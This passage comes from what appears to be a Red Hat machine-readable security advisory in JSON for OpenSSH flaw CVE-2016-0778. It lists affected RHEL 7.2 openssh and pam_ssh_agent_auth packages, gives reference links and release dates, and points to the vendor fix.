"7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7ComputeNode-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7ComputeNode-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Server-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Server-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Server-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Workstation-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Workstation-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Workstation-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2016-0778" }, { "category": "external", "summary": "RHBZ#1298033", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1298033" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2016-0778", "url": "https://www.cve.org/CVERecord?id=CVE-2016-0778" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2016-0778", "url": "https://nvd.nist.gov/vuln/detail/CVE-2016-0778" }, { "category": "external", "summary": "http://www.openssh.com/txt/release-7.1p2", "url": "http://www.openssh.com/txt/release-7.1p2" }, { "category": "external", "summary": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt", "url": "https://www.qualys.com/2016/01/14/cve-2016-0777-cve-2016-0778/openssh-cve-2016-0777-cve-2016-0778.txt" } ], "release_date": "2016-01-14T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2016-01-14T20:20:12+00:00", "details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.src", "7Client-optional-7.2.Z:openssh-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-askpass-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-clients-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.i686", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-debuginfo-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-keycat-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-ldap-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.ppc64le", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.s390x", "7Client-optional-7.2.Z:openssh-server-sysvinit-0:6.6.1p1-23.el7_2.x86_64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.i686", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.ppc64le", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.s390x", "7Client-optional-7.2.Z:pam_ssh_agent_auth-0:0.9.3-9.23.el7_2.x86_64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64", "7ComputeNode-7.2.Z:openssh-0:6.6.1p1-23.el7_2.ppc64le", 